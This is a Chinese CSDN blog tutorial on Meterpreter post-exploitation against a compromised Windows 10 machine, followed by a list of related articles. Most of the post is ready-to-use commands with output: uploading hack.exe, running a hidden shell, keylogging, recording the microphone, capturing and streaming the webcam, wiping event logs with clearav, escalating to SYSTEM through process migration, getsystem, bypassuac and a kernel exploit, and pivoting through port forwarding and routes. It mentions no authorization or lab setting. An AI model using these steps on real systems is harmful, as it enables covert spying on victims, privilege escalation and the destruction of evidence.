kali-远程执行命令

已于 2023-12-19 23:00:55 修改
阅读量1k 收藏 18
点赞数 15
分类专栏: 玩转Kali 文章标签: bash linux
于 2023-12-19 22:57:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18931093/article/details/135096502
版权

文章目录

  • 一、远程执行命令
  • 二、WIN10提权
  • 三、其他提权方法
    • 1.**getsystem**
    • 2.**bypassuac**
    • 3.**内核漏洞提权**

一、远程执行命令

书接上回,监听之后可以远程执行指令

#列出当前所在目录
meterpreter > pwd
#列出本地当前所在目录
meterpreter > lpwd
#跳转指定目录
meterpreter > cd  c:\\
#查看当前目录
meterpreter > dir
#指定上传文件
meterpreter > upload hack.exe
#使用execute命令在目标系统中执行命令
meterpreter > execute  -f notepad.exe       #在对方电脑上,弹出一个记事本.exe
meterpreter > edit a.txt Hello!             #编辑文本
meterpreter > execute -f "notepad.exe a.txt"#使用记事本打开文本
meterpreter > execute -f calc.exe           #在对方电脑上,弹出计算器 
meterpreter > execute -H -i -f cmd.exe      #以后台,隐藏的方式,运行 cmd 
输入:exit  退出
#屏幕截图
meterpreter > screenshot
#屏幕分享
meterpreter > screenshare
#vnc只能看不能操作
meterpreter > run vnc
#键盘监听
meterpreter > keyscan_start 
meterpreter > keyscan_stop
#麦克风监听 秒
meterpreter > record_mic -d 5
#查看摄像头
meterpreter > webcam_list
1: Chicony USB2.0 Camera
#使用设备1拍照
meterpreter > webcam_snap -i 1
#实时监控
meterpreter > webcam_stream -i 1 
#help查看命令
meterpreter > help
#清除windows中的应用程序日志、系统日志、安全日志
meterpreter > clearav

二、WIN10提权

在Windows中,超级管理员权限和系统权限是两种不同的访问权限级别。

超级管理员权限(或称为管理员权限)是Windows操作系统中最高的权限级别之一。具有超级管理员权限的用户拥有对操作系统的完全访问权限,可以执行系统范围的修改、安装和卸载应用程序、更改系统设置等操作。超级管理员权限对系统文件和关键系统组件具有完全控制权。

系统权限是指系统级别的权限,在Windows操作系统中用于控制系统服务和其他系统特性的访问级别。这包括管理网络连接、配置系统时间、监视系统事件日志等功能。系统权限由操作系统自动管理,并且只有特定的系统进程和服务具有这些权限。

需要注意的是,超级管理员权限是一个用户角色,而系统权限是操作系统内部使用的权限级别。超级管理员权限可以被分配给不同的用户账户,而系统权限只能由操作系统进程和服务使用。

在日常使用电脑时,我们通常以管理员权限登录操作系统,这样可以执行大多数常见的管理任务。只有在特定情况下,例如需要修改系统设置或进行高级系统维护时,才需要使用超级管理员权限。

#查看当前用户
meterpreter > getuid     
Server username: WHOISME\13038

#查看进程 -s查看系统进程Win10
meterpreter > ps -s
Filtering on SYSTEM processes...
No matching processes were found.
#查看进程
meterpreter > ps
Process List
============

 PID    PPID   Name                                   Arch  Session  User           Path
 ---    ----   ----                                   ----  -------  ----           ----
 0      0      [System Process]
 4      0      System
 224    4      Registry
 800    4      smss.exe
 1140   1000   csrss.exe
 1172   1652   dwm.exe
 1240   1324   svchost.exe
 1244   1000   wininit.exe
 1252   1236   csrss.exe

#当前程序PID
meterpreter > getpid
Current pid: 6576
#win10可以迁移进程系统PID完成提权
meterpreter > migrate 1240

#转移到非系统用户,查看资源管理器(用户)进程
meterpreter > ps -S explorer
Filtering on 'explorer'
Process List
============

 PID   PPID   Name          Arch  Session  User           Path
 ---   ----   ----          ----  -------  ----           ----
 8060  10100  explorer.exe  x64   1        WHOISME\13038  C:\Windows\explorer.exe
#迁移进程至目标PID
meterpreter > migrate 8060

#其他思路

#将目标机的3389端口转发到本地6666端口
portfwd add -l 6666 -p 3389 -r 127.0.0.1 
#添加路由
run autoroute –h #查看帮助
run autoroute -s 192.168.159.0/24  #添加到目标环境网络
run autoroute –p  #查看添加的路由

三、其他提权方法

参考CSDN博主「白昼安全」的原创文章方法

1.getsystem

getsystem

getsystem工作原理:

①getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管道。

②getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。

③Windows服务已启动,导致与命名管道建立连接。

④该进程接收连接并调用ImpersonateNamedPipeClient,从而为SYSTEM用户创建模拟令牌。
然后用新收集的SYSTEM模拟令牌产生cmd.exe,并且我们有一个SYSTEM特权进程。

2.bypassuac

内置多个bypassuac脚本,原理有所不同,使用方法类似,运行后返回一个新的会话,需要再次执行getsystem获取系统权限,如:

use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask

如何使用bypassuac.rb脚本:

msf > use exploit/windows/local/bypassuac
msf > set SESSION 2
msf > run

3.内核漏洞提权

可先利用enum_patches模块 收集补丁信息,然后查找可用的exploits进行提权

meterpreter > run post/windows/gather/enum_patches  #查看补丁信息
msf > use exploit/windows/local/ms13_053_schlamperei
msf > set SESSION 2
msf > exploit
睡不着乌托托
关注
  • 15
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Struts2-S2-061远程命令执行(CVE-2020-17530)漏洞复现
qq_57172130的博客
05-03 705
目录 框架介绍 漏洞原理 影响版本 环境搭建 漏洞探测 漏洞利用 防御措施 框架介绍 Apache Struts 2最初被称为WebWork 2,它是一个简洁的、可扩展的框架,可用于创建企业级Java web应用程序。Struts 2是Struts 1的一个升级版,但是它和Struts 1来相比,提供了太多的增强和改进,怎么运行的呢,就是实现了Servlet的功能,来进行控制页面跳转。同时这也是基于MVC设计模式的Web应用框架,Struts 2的控制功能就相当于MVC中的Controll
Kali Linux远程控制
qq_71207842的博客
06-12 2365
如果可以选择的话,你觉得黑客最希望对目标系统做些什么呢? 1、让目标系统上的服务崩溃。 2、在目标系统上执行某个程序。 3、直接控制目标系统。 是不是第3个选择是最激动人心的呢?
远程命令行执行工具
12-19
VS2010编写,可以在运行了服务端的机子上执行命令行,并将执行结果返回客户端
远程执行命令
weixin_30249203的博客
05-23 63
服务器: #远程执行命令 from socket import * import subprocess ip_port=('127.0.0.1',8080) back_log=5 buffer_size=1024 tcp_server=socket(AF_INET,SOCK_STREAM) tcp_server.bind(ip_port) tcp_server....
Linux Shell远程执行命令
最新发布
程序猿老樊的博客
07-29 1382
例如 ssh user@node cd /local ls 则 ls 只会执行 cd /local 命令,ls命令在本地执行,加了双引号或者单引号,则被括起来的命令被当做ssh命令的一个参数,所以会在远程连续执行。远程执行的内容在"< < remotessh " 至" remotessh "之间,在远程机器上的操作就位于其中,注意的点:
远程系统命令执行
山兔的博客
07-23 178
可以用来绕过系统命令远程系统的执行,后面加个ping-c4127.0.0.1。
Windows远程执行命令
小晓晓晓林的博客
01-21 1万+
环境:Win10、Win7虚拟机 Windows远程命令执行 1、psexec.exe远程执行命令 psexec \\192.168.30.128 -u Administrator -p 123456789 cmd.exe 这里一开始登陆的是另一个管理员账号,但是一直被拒绝访问,后来把Administrator账号取消隐藏,一下就连接上。之后看到一篇文章也有一样的情况,只有Admin...
RCE(远程命令执行)(例题包括命令注入和eval注入)
2401_82388450的博客
04-09 1257
远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。RCE分为远程执行命令(执行ping命令)和远程代码执行eval。二、RCE漏洞的分类1.命令注入(通过控制外部的参数达到执行系统命令的效果) 2.文件包含 3.eval注入(1)命令注入。
kali:树莓派3安装专用Kali-2.1.2并配置远程桌面教程
03-28
在本教程中,我们将深入探讨如何在树莓派3上安装Kali Linux 2.1.2,并进行必要的配置,包括设置远程桌面访问。树莓派作为一款小巧且功能强大的单板计算机,常被用于各种项目,特别是对于黑客和安全研究人员而言,...
PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)
X_IT666的博客
07-28 1286
漏洞介绍 关于漏洞:PHP 8.1.0-dev 后门远程命令执行漏洞 PHP verion 8.1.0-dev的PHP在服务器上运行,则攻击者可以通过发送User-Agentt标头执行任意代码。 影响版本:PHP 8.1.0-dev 配置环境: 靶机:centos8 攻击机:kali 其他:vulhub -->php–>8.1-backdoor 漏洞攻击思路: 扫描端口,确定开启的服务,漏洞寻找,漏洞利用 信息收集 nmap扫描端口 访问http://192.168
kali linux远程控制
WeiMengPing_的博客
06-12 1637
为了防止黑客偷偷在计算机上安装远程控制被控端,我们通常会在计算机上安装杀毒软件,如我们都很熟悉的 360 卫等。试图将远程控制被控端植目标系统时,常常会被这些杀毒软件发现并阻止。长期以来,杀毒软件厂商和黑客一直处于博弈的状态,杀毒软件厂商研究了各种检测和清除远程控制被控端的方法,而黑客也一直致力于研究避开检测的方法(简称为免杀技)术)。双方“各显神通”,一直在“魔高一尺,道高一丈,魔再高一丈”地发展着。
远程命令执行漏洞
08-10
NULL 博文链接:https://crabdave.iteye.com/blog/2211641
常见的远程执行命令方式整理
01-07
常见的远程执行命令方式整理
Linux中的Shell用SSH自动登录远程服务器后执行命令并自动退出
qq_27286399的博客
09-21 6949
目录 [隐藏] 1 SSH命令格式 2 主要参数说明 3 ssh控制远程主机,远程执行命令步骤 4 准备工作 5 基于公私钥认证远程登录可能存在的不足 6 ssh 执行远程命令格式 6.1 打开远程shell 7 ssh的-t参数 SSH命令格式 usage: ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec] [-D [bind_address:]port] [-e esca
远程代码与命令执行
weixin_41489908的博客
05-31 589
​祝我什么都行,就是别祝我幸福,我要是拿走你的钱财,然后祝你发财,合适么。。。 ---- 网易云热评 1、eval,将字符串当成PHP代码执行 新建php文件,代码如下 eval($_GET['a']); //相当于执行eval(phpinfo()) 访问:http://192.168.139.129/?a=phpinfo(); 2、assert,判断一个表达式是否成立 新一个PHP文件,代码如下 echo(assert($_GET['a']>3)); 传递的参数大于3返..
命令执行漏洞——远程命令执行
weixin_54055099的博客
09-17 3932
命令执行漏洞之远程命令执行的基础操作
远程代码执行和远程命令执行是一个东西吗
Nove1205的博客
06-15 610
远程代码执行和远程命令执行是一个东西吗
适用于kali linux远程桌面开启方法(从windows xp 远程登录到kali linux )
热门推荐
macrohasdefined的专栏
06-04 1万+
为了解决Windows远程桌面访问Ubuntu 12.04 之一 中提到的VNC远程桌面的缺点(见http://www.linuxidc.com/Linux/2012-07/64801.htm),我们采用第二种方法XRDP,该方法支持多用户登录并远程桌面。 1、首先参考Windows远程桌面访问Ubuntu 12.04 之安装VNC中提到的安装GNOME桌面方法(点击这里); 2、进入GNOM
Kali Linux 使用远程桌面连接——xrdp&xfce
Imagine Miracle的博客
05-06 1万+
Kali Linux 开启远程桌面服务
kali远程控制windows命令
04-21
Kali Linux是一种流行的渗透测试和网络安全评估操作系统,它提供了许多工具和功能来进行远程控制和攻击测试。在Kali Linux中,你可以使用不同的方法来远程控制Windows命令行。 一种常见的方法是使用反向Shell。反向Shell是一种技术,它允许攻击者通过建立与目标系统的连接来执行命令。以下是使用反向Shell远程控制Windows命令行的步骤: 1. 在Kali Linux上启动一个监听器:在Kali Linux上使用Netcat或其他工具启动一个监听器,等待与目标系统建立连接。 2. 在目标系统上运行恶意代码:在目标Windows系统上运行一个恶意代码,该代码将与Kali Linux上的监听器建立连接。 3. 执行命令:一旦与目标系统建立连接,你可以在Kali Linux执行命令,并将结果发送回目标系统。 需要注意的是,远程控制他人计算机是非法的,除非你有合法的授权和目的。在进行任何安全测试之前,请确保你已经获得了适当的授权,并遵守法律和道德规范。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

睡不着乌托托

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值